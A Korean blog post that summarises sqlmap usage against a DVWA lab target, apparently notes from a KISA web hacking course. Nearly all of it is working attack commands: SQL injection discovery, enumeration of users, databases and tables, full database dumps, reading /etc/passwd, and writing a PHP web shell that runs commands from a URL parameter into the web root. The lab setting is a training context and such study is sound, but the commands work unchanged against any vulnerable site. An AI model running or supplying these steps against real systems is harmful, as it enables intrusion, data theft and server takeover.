Security

SQLMAP 핵심 요약

Bonita SY 2021. 1. 5. 19:56
728x90
반응형
값에 매개변수 ID 찾음

http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1
http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1'

sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1

쿠기값 설정 및 입력
sqlmap.py --cookie="PHPSESSID=oepqtlrjsve31n793g1n2qert0; security=low" –u "http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1"

--technique
--wizard 

오류 기반 이용 데이터베이스 사용자 및 데이터 베이스 목록
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --current-user

데이터베이스 목록
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --dbs

테이블 덤프
sqlmap.py --technique=E -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 -D security --tables

데이터베이스 및 테이블
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1  -D security -T users --dump

전체 덤프 (권장하지 않음)
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1  --dump-all

권한 확인 -> 파일 읽기 및 쓰기 (FILE)
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --privileges

파일 읽기
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --file-read=/etc/passwd

웹쉘 삽입 (<?php system($_GET[1337]); ?>)
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --file-write=shell.php --file-dest=/var/www/shell-php.php

=========================================================================
sqlmap.py --cookie="PHPSESSID=oepqtlrjsve31n793g1n2qert0; security=low" –u "http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=asdf&Submit=Submit#" --dbs

 

 

KISA 웹 해킹 교육가서 배운 sqlmap 핵심 요약 정리

728x90
반응형